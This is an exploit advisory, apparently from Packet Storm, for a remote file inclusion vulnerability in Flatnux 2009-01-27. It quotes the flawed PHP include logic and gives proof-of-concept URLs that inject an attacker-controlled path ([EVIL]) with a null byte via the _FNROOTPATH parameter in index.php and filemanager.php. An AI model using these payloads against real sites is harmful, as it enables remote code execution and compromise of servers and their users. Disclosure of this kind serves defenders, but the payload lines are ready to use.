Flatnux version 2009-01-27 suffers from a remote file inclusion vulnerability.
106407e0aa659e1095065a12a28ae77957fd730d0809322c249604f0b7aac95e@ flatnux Flatnux-2009-01-27 RFI
zależności P
+ Alfons Luja
+ 2009
+ grts : All friends
VULN :
+++ include/theme.php
...
<?php
if (eregi("theme.php", $_SERVER['PHP_SELF']))
die(); // 0 <-- I dont give a fuck
global $theme, $_FNROOTPATH,$lang; //<-- 1
global $forumback, $forumborder;
$_FN['table_background']=&$forumback;
$_FN['table_border']=&$forumborder;
if ($forumback=="" && $forumborder==""){
$forumback="ffffff";
$forumborder="000000";
}
require_once ($_FNROOTPATH . "themes/$theme/theme.php");
/*------- Funzioni ridefinibili da theme.php--------------*/
//......
+++ /flatnux.php line 116:
//$_FNROOTPATH Still dont have value
include_once "./include/theme.php"; //-- 2
+++ /filemanager.php
include "./include/flatnux.php"; // -- RFI
p0c:
http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00
http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO
... itd ...
--http://www.wrzuta.pl/audio/xLyg0zckZS/--
#EŁOF lol
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed